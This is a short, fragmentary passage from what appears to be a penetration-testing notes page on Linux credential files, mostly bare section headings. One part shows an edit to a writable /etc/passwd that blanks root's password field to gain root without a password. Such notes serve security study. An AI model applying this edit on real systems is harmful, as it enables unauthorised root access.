Passwd, Shadow & Opasswd
Passwd File
# It the /etc/passwd file is writable by us
# Editing /etc/passwd - Before
root:x:0:0:root:/root:/bin/bash
# Editing /etc/passwd - After
root::0:0:root:/root:/bin/bashShadow File
Algorithm Types
Opasswd
Cracking Linux Credentials
Last updated